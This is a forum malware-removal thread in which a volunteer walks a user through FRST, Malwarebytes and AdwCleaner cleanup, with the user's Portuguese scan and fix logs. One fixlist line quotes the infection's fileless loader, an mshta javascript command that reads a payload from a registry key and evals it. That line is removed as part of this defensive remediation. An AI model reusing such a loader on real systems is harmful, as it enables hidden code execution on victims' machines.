Error: (08/03/2017 11:01:44 AM) (Source: DCOM) (EventID: 10010) (User: AUTORIDADE NT)
Description: O servidor {784E29F4-5EBE-4279-9948-1E8FE941646D} não se registrou no DCOM dentro do tempo limite necessário.
 
 
CodeIntegrity:
===================================
  Date: 2017-08-03 14:28:02.389
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\amdhdl64.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-03 14:28:02.113
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Informações da Memória =========================== 
 
Processador: Intel® Core™ i5-5200U CPU @ 2.20GHz
Percentagem de memória em uso: 36%
RAM física total: 8106.45 MB
RAM física disponível: 5171.34 MB
Virtual Total: 9386.45 MB
Virtual disponível: 6108.78 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:922.14 GB) (Free:186.38 GB) NTFS
 
==================== MBR & Tabela de Partições ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 937D90CC)
 
Partition: GPT.
 
==================== Fim de Addition.txt ============================


#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:55 AM

Posted 03 August 2017 - 02:49 PM

Alright, follow the instructions below.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Download the attached fixlist.txt file, and save it on your Desktop (or wherever your FRST.exe/FRST64.exe executable is located);
  • Right-click on the FRST executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
    NYA5Cbr.png
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;

Attached Files


unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 Hercilio

Hercilio
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Brazil
  • Local time:03:55 AM

Posted 03 August 2017 - 04:03 PM

Resultado da Correção pela Farbar Recovery Scan Tool (x64) Versão: 31-07-2017
Executado por Hercílio (03-08-2017 17:52:05) Run:2
Executando a partir de C:\Users\Hercílio\Desktop
Perfis Carregados: Hercílio (Perfis Disponíveis: Hercílio)
Modo da Inicialização: Normal
==============================================
 
fixlist Conteúdo:
*****************
CloseProcesses:
CreateRestorePoint:
 
REG: REG QUERY HKEY_CURRENT_USER\Software\jgsxvl /s
 
DeleteKey: HKEY_CURRENT_USER\Software\jgsxvl
 
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Run: [psexe] => C:\Users\Hercílio\AppData\Roaming\pxese.exe [1835008 2017-08-03] ()
HKU\S-1-5-18\...\Run: [psexe] => C:\WINDOWS\SysWOW64\config\systemprofile\AppData\Roaming\pxese.exe [1835008 2017-08-03] ()
GroupPolicy: Restrição <==== ATENÇÃO
CHR HKLM\SOFTWARE\Policies\Google: Restrição <==== ATENÇÃO
CHR HKU\S-1-5-21-459013025-3067968454-1995941679-1001\SOFTWARE\Policies\Google: Restrição <==== ATENÇÃO
 
CHR DefaultSearchURL: Default -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
 
HKU\.DEFAULT\Software\Classes\15c1c1c: "C:\WINDOWS\system32\mshta.exe" "javascript:V0Mr2W="RZ9A6Jb";N2n=new ActiveXObject("WScript.Shell");rPtAR52="GaXZcEtG";Pf8X9X=N2n.RegRead("HKCU\\software\\jgsxvl\\ehwentqye");jpOrbSG1="p";eval(Pf8X9X);El3JI="uLK";" <==== ATENÇÃO
 
Task: {1A1ADE13-9829-4331-9213-7764F1E76D34} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Nenhum Arquivo <==== ATENÇÃO
Task: {2AD8317F-D205-44E5-AE59-0781E8ACE7D5} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {34FB3448-893F-493D-ABD7-09D4BDFF762B} - System32\Tasks\{92CF0002-651B-43D2-8151-C19D7B8F7290} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files\ByteFence\ByteFence.exe" -c /uninstall
Task: {3BFFF2D2-D819-4EFB-AEA7-37F7FA841A7C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATENÇÃO
Task: {538DCEB1-FD32-444F-B278-E6457C101F82} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {55CE1D81-E387-4B19-B73E-14252D65ED9F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {69E8BADB-4394-4892-87DF-C5A9163071CA} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {8DBC6239-677F-4B5F-A513-81FB4E682BAD} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {A8213CD5-D9EF-4E86-AB53-6596AE36500C} - System32\Tasks\{A493C15F-E0DF-44CC-B7FE-7D53EFDA7A50} => "c:\program files (x86)\google\chrome\application\chrome.exe" hxxp://ui.skype.com/ui/0/7.24.85.104/pt/abandoninstall?page=tsMain
Task: {A9CDABCE-90E9-4EAA-8B26-ACCA1D6BBA1E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {AE535F27-94A0-4DE8-A25F-8632948727EB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATENÇÃO
Task: {B80159A1-5CFF-47F5-8159-DD903066A604} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {D52EB235-BE84-4E14-8C8B-FE88D28618A9} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Nenhum Arquivo <==== ATENÇÃO
Task: {DC6E9AF2-310F-4A8B-8AB1-C9B33FA63496} - System32\Tasks\{FB1438C9-653B-4FD0-A4F5-559B9D954CCC} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Pcsx2\pcsx2.exe" -d "C:\Program Files (x86)\Pcsx2"
Task: {EA230FE4-0415-4E21-A56D-50F45B384B30} - System32\Tasks\RealtekUpdate => wscript "C:\Users\Hercílio\AppData\Roaming\Realtek\Realtek\RealtekUpdate.vbs"
 
AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10]
 
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "psexe"
 
C:\ProgramData\{74E9F814-C737-42CC-B721-DBBC4059367A}
C:\Users\Hercílio\Downloads\KMSpico 10.1.8 FINAL + Portable (Office and Windows 10 Activator) [TechTools]
C:\Users\Hercílio\AppData\Local\{31609F87-792D-452B-A799-CB0D7B589CF5}
C:\Users\Hercílio\AppData\Local\{5E3C3A73-CDE7-406C-A35C-482B7D6618E2}
C:\Users\Hercílio\AppData\Local\{6F2A5D38-59DF-44FC-A339-6546150E9A01}
C:\Users\Hercílio\AppData\Local\{85380981-3389-4860-8A4F-201B694530DF}
C:\Users\Hercílio\AppData\Local\{DFA58381-49E3-4E5B-A149-EB3B89B425DA}
C:\Users\Hercílio\AppData\Local\{E8EF03DA-F8BA-439A-A4BB-546EEE37B099}
C:\Users\Hercílio\AppData\Local\{FEECC933-41BE-42BE-A6B8-8C8722F071D8}
C:\Users\Hercílio\AppData\Roaming\F348644F8C8E38493023A2CA41BE1BED
C:\Users\Hercílio\AppData\Roaming\E7BD4BE3219227505EC81A001EF0D262
C:\Users\Hercílio\AppData\Roaming\766304432F4B4AF71668BA8EE91BAB73
C:\Users\Hercílio\AppData\Roaming\F70555010177884C9C2184467F078255
C:\Users\Hercílio\AppData\Roaming\78DF6D034C85415260CC2E9412198DB6
C:\Users\Hercílio\AppData\Roaming\Realtek
C:\Users\Hercílio\AppData\Roaming\appdataFr25.bin
C:\Users\Hercílio\AppData\Roaming\del.bat
C:\Users\Hercílio\AppData\Roaming\pxese.exe
C:\WINDOWS\SysWOW64\config\systemprofile\AppData\Roaming\pxese.exe
C:\WINDOWS\SECOH-QAD.exe
C:\WINDOWS\SECOH-QAD.dll
 
Hosts:
EmptyTemp:
*****************
 
Processos fechados com sucesso.
Ponto de Restauração criado com sucesso.
 
========= REG QUERY HKEY_CURRENT_USER\Software\jgsxvl /s =========
 
ERRO: O sistema nÆo p“de localizar a chave do Registro ou valor especificado.
 
 
========= Fim de Reg: =========
 
HKEY_CURRENT_USER\Software\jgsxvl => chave não encontrado (a). 
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\Software\Microsoft\Windows\CurrentVersion\Run\\psexe => valor removido (a) com sucesso.
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\psexe => valor removido (a) com sucesso.
C:\WINDOWS\system32\GroupPolicy\Machine => movido com sucesso
C:\WINDOWS\system32\GroupPolicy\GPT.ini => movido com sucesso
HKLM\SOFTWARE\Policies\Google => chave removido (a) com sucesso.
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\SOFTWARE\Policies\Google => chave removido (a) com sucesso.
Chrome DefaultSearchURL => removido (a) com sucesso.
Chrome DefaultSuggestURL => removido (a) com sucesso.
HKU\.DEFAULT\Software\Classes\15c1c1c => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1A1ADE13-9829-4331-9213-7764F1E76D34} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1A1ADE13-9829-4331-9213-7764F1E76D34} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2AD8317F-D205-44E5-AE59-0781E8ACE7D5} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2AD8317F-D205-44E5-AE59-0781E8ACE7D5} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{34FB3448-893F-493D-ABD7-09D4BDFF762B} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{34FB3448-893F-493D-ABD7-09D4BDFF762B} => chave removido (a) com sucesso.
C:\WINDOWS\System32\Tasks\{92CF0002-651B-43D2-8151-C19D7B8F7290} => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{92CF0002-651B-43D2-8151-C19D7B8F7290} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3BFFF2D2-D819-4EFB-AEA7-37F7FA841A7C} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3BFFF2D2-D819-4EFB-AEA7-37F7FA841A7C} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{538DCEB1-FD32-444F-B278-E6457C101F82} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{538DCEB1-FD32-444F-B278-E6457C101F82} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{55CE1D81-E387-4B19-B73E-14252D65ED9F} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{55CE1D81-E387-4B19-B73E-14252D65ED9F} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{69E8BADB-4394-4892-87DF-C5A9163071CA} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{69E8BADB-4394-4892-87DF-C5A9163071CA} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8DBC6239-677F-4B5F-A513-81FB4E682BAD} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8DBC6239-677F-4B5F-A513-81FB4E682BAD} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A8213CD5-D9EF-4E86-AB53-6596AE36500C} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A8213CD5-D9EF-4E86-AB53-6596AE36500C} => chave removido (a) com sucesso.
C:\WINDOWS\System32\Tasks\{A493C15F-E0DF-44CC-B7FE-7D53EFDA7A50} => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{A493C15F-E0DF-44CC-B7FE-7D53EFDA7A50} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A9CDABCE-90E9-4EAA-8B26-ACCA1D6BBA1E} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A9CDABCE-90E9-4EAA-8B26-ACCA1D6BBA1E} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AE535F27-94A0-4DE8-A25F-8632948727EB} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AE535F27-94A0-4DE8-A25F-8632948727EB} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B80159A1-5CFF-47F5-8159-DD903066A604} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B80159A1-5CFF-47F5-8159-DD903066A604} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D52EB235-BE84-4E14-8C8B-FE88D28618A9} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D52EB235-BE84-4E14-8C8B-FE88D28618A9} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OfficeSoftwareProtectionPlatform\SvcRestartTask => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DC6E9AF2-310F-4A8B-8AB1-C9B33FA63496} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DC6E9AF2-310F-4A8B-8AB1-C9B33FA63496} => chave removido (a) com sucesso.
C:\WINDOWS\System32\Tasks\{FB1438C9-653B-4FD0-A4F5-559B9D954CCC} => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{FB1438C9-653B-4FD0-A4F5-559B9D954CCC} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{EA230FE4-0415-4E21-A56D-50F45B384B30} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EA230FE4-0415-4E21-A56D-50F45B384B30} => chave removido (a) com sucesso.
C:\WINDOWS\System32\Tasks\RealtekUpdate => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RealtekUpdate => chave removido (a) com sucesso.
C:\Program Files (x86)\GbPlugin => ":IncompleteStartProcessProtection.cnt" ADS removido (a) com sucesso..
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\psexe => valor removido (a) com sucesso.
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\psexe => valor não encontrado (a).
C:\ProgramData\{74E9F814-C737-42CC-B721-DBBC4059367A} => movido com sucesso
C:\Users\Hercílio\Downloads\KMSpico 10.1.8 FINAL + Portable (Office and Windows 10 Activator) [TechTools] => movido com sucesso
C:\Users\Hercílio\AppData\Local\{31609F87-792D-452B-A799-CB0D7B589CF5} => movido com sucesso
C:\Users\Hercílio\AppData\Local\{5E3C3A73-CDE7-406C-A35C-482B7D6618E2} => movido com sucesso
C:\Users\Hercílio\AppData\Local\{6F2A5D38-59DF-44FC-A339-6546150E9A01} => movido com sucesso
C:\Users\Hercílio\AppData\Local\{85380981-3389-4860-8A4F-201B694530DF} => movido com sucesso
C:\Users\Hercílio\AppData\Local\{DFA58381-49E3-4E5B-A149-EB3B89B425DA} => movido com sucesso
C:\Users\Hercílio\AppData\Local\{E8EF03DA-F8BA-439A-A4BB-546EEE37B099} => movido com sucesso
C:\Users\Hercílio\AppData\Local\{FEECC933-41BE-42BE-A6B8-8C8722F071D8} => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\F348644F8C8E38493023A2CA41BE1BED => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\E7BD4BE3219227505EC81A001EF0D262 => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\766304432F4B4AF71668BA8EE91BAB73 => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\F70555010177884C9C2184467F078255 => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\78DF6D034C85415260CC2E9412198DB6 => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\Realtek => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\appdataFr25.bin => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\del.bat => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\pxese.exe => movido com sucesso
C:\WINDOWS\SysWOW64\config\systemprofile\AppData\Roaming\pxese.exe => movido com sucesso
C:\WINDOWS\SECOH-QAD.exe => movido com sucesso
C:\WINDOWS\SECOH-QAD.dll => movido com sucesso
C:\Windows\System32\Drivers\etc\hosts => movido com sucesso
Hosts restaurado com sucesso.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 7888896 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 19275146 B
Java, Flash, Steam htmlcache => 449251000 B
Windows/system/drivers => 3098688 B
Edge => 389445 B
Chrome => 466114035 B
Firefox => 6780063 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 26294 B
NetworkService => 574214 B
Hercílio => 10428428 B
 
RecycleBin => 0 B
EmptyTemp: => 919.2 MB de dados temporários Removidos.
 
================================
 
 
O sistema precisou ser reiniciado.
 
==== Fim de Fixlog 17:54:43 ====


#6 Hercilio

Hercilio
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Brazil
  • Local time:03:55 AM

Posted 03 August 2017 - 04:05 PM

Hello Aura!

 

Thank you for the support! The file is not there and everything seems to be working just fine!

 

Again, thank you for the help and the patience!

 

Will wait for an answer about the Fixlog. :)



#7 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:55 AM

Posted 03 August 2017 - 05:42 PM

Good :) Now, there's two things I would like to do before I let you go.

First, can you .zip the following folder C:­\FRST\Quarantine and upload it to the link below?

http://www.bleepingcomputer.com/submit-malware.php?channel=194

And secondly, we'll run a scan with Malwarebytes to make sure there's nothing left behind.

j1Bynr2.pngMalwarebytes - Clean Mode
  • Download and install the free version of Malwarebytes
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point;
  • Once Malwarebytes is installed, launch it and let it update his database. You might have to click on the little arrow by Scan Status in the middle right pane for it to do so;
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan;
  • Let the scan run, the time required to complete the scan depends of your system and computer specs;
  • Once the scan is complete, make sure that the first checkbox at the top is checked (which will automatically check every detected item), then click on the Quarantine Selected button;
    • If it asks you to restart your computer to complete the removal, do so;
  • Click on Export Summary after the deletion (in the bottom-left corner) and select Copy to Clipboard. Paste the content in your next reply;

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#8 Hercilio

Hercilio
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Brazil
  • Local time:03:55 AM

Posted 04 August 2017 - 07:20 AM

Hello Aura

 

I tried to upload the .zip file but it seems to be too big (16MB) and the link to upload gave me the "The size of your file is greater than maximum file size of 10 MBs."

 

I'm scanning with MalwareBytes, will show Export Summary on next post. 



#9 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:55 AM

Posted 04 August 2017 - 07:25 AM

You can upload it on SendSpace, and PM me the download URL.

https://www.sendspace.com/

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#10 Hercilio

Hercilio
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Brazil
  • Local time:03:55 AM

Posted 04 August 2017 - 07:34 AM

Hello Aura

 

I've sent the quarantine .zip file through PM and here is the Export Summary:

 

Malwarebytes
www.malwarebytes.com
 
-Detalhes de registro-
Data da análise: 04/08/17
Hora da análise: 09:21
Arquivo de registro: Export Summary.txt
Administrador: Sim
 
-Informação do software-
Versão: 3.1.2.1733
Versão de componentes: 1.0.160
Versão do pacote de definições: 1.0.2507
Licença: Grátis
 
-Informação do sistema-
Sistema operacional: Windows 10 (Build 15063.483)
CPU: x64
Sistema de arquivos: NTFS
Usuário: PC-NETINHO\Herc\u00c3\u00adlio
 
-Resumo da análise-
Tipo de análise: Análise de Ameaças
Resultado: Concluído
Objetos verificados: 435608
Ameaças detectadas: 14
Ameaças em quarentena: 14
Tempo decorrido: 9 min, 42 seg
 
-Opções da análise-
Memória: Habilitado
Inicialização: Habilitado
Sistema de arquivos: Habilitado
Arquivos compactados: Desabilitado
Rootkits: Desabilitado
Heurística: Habilitado
PUP: Habilitado
PUM: Habilitado
 
-Detalhes da análise-
Processo: 2
PUP.Optional.AdvancedSystemCare, C:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\ASCSERVICE.EXE, Quarentena, [1181], [396386],1.0.2507
PUP.Optional.AdvancedSystemCare, C:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\MONITOR.EXE, Quarentena, [1181], [398206],1.0.2507
 
Módulo: 2
PUP.Optional.AdvancedSystemCare, C:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\ASCSERVICE.EXE, Quarentena, [1181], [396386],1.0.2507
PUP.Optional.AdvancedSystemCare, C:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\MONITOR.EXE, Quarentena, [1181], [398206],1.0.2507
 
Chave de registro: 1
PUP.Optional.AdvancedSystemCare, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\AdvancedSystemCareService10, Excluir ao reiniciar, [1181], [396386],1.0.2507
 
Valor de registro: 1
PUP.Optional.AdvancedSystemCare, HKU\S-1-5-21-459013025-3067968454-1995941679-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|Advanced SystemCare 10, Excluir ao reiniciar, [1181], [396386],1.0.2507
 
Dados de registro: 0
(Nenhum item malicioso detectado)
 
Fluxo de dados: 0
(Nenhum item malicioso detectado)
 
Pasta: 0
(Nenhum item malicioso detectado)
 
Arquivo: 8
PUP.Optional.AdvancedSystemCare, C:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\ASCSERVICE.EXE, Excluir ao reiniciar, [1181], [396386],1.0.2507
PUP.Optional.AdvancedSystemCare, C:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\ASCTRAY.EXE, Excluir ao reiniciar, [1181], [396386],1.0.2507
PUP.Optional.GameHack, C:\PROGRAM FILES (X86)\CHEAT ENGINE 6.6\STANDALONEPHASE1.DAT, Excluir ao reiniciar, [676], [393793],1.0.2507
PUP.Optional.OpenCandy, C:\USERS\HERCíLIO\DOWNLOADS\CHEATENGINE67.EXE, Excluir ao reiniciar, [509], [101648],1.0.2507
PUP.Optional.OpenCandy, C:\USERS\HERCíLIO\DOWNLOADS\CHEATENGINE66.EXE, Excluir ao reiniciar, [509], [101648],1.0.2507
PUP.Optional.AdvancedSystemCare, C:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\MONITOR.EXE, Excluir ao reiniciar, [1181], [398206],1.0.2507
PUP.Optional.AdvancedSystemCare, C:\WINDOWS\SYSTEM32\TASKS\ASC10_PerformanceMonitor, Excluir ao reiniciar, [1181], [380341],1.0.2507
PUP.Optional.AdvancedSystemCare, C:\WINDOWS\SYSTEM32\TASKS\ASC10_SkipUac_Hercílio, Excluir ao reiniciar, [1181], [380341],1.0.2507
 
Setor físico: 0
(Nenhum item malicioso detectado)
 
 
(end)


#11 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:55 AM

Posted 04 August 2017 - 07:40 AM

Good, thank you :)

For future reference (or for other users that are having the same issues and reading through this thread), Malwarebytes can detect and delete this thread (pxese.exe).

https://www.virustotal.com/en/file/cdcb6840b67ab0c96509916c1abb1d029a7b4d3bde4ba5983eebc4482a7789f1/analysis/1501850237/

Another threat present on your system was a BTC miner.

https://www.virustotal.com/en/file/a2891707cdfd3dc555d697d6e2037ac2eecdfcd52fb6ca74237dd1a458a4ec1c/analysis/1501850221/

Now we'll run a sweep with AdwCleaner and JRT.

zcMPezJ.pngAdwCleaner - Fix Mode
  • Download AdwCleaner and move it to your Desktop;
  • Right-click on AdwCleaner.exe and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the EULA (I accept), then click on Scan;
  • Let the scan complete. Once it's done, make sure that every item listed in the different tabs is checked and click on the Clean button. This will kill all active processes;
    V7SD4El.png
  • Once the cleaning process is complete, AdwCleaner will ask to restart your computer, do it;
  • After the restart, a log will open when logging in. Please copy/paste the content of that log in your next reply;
iT103hr.pngJunkware Removal Tool (JRT)
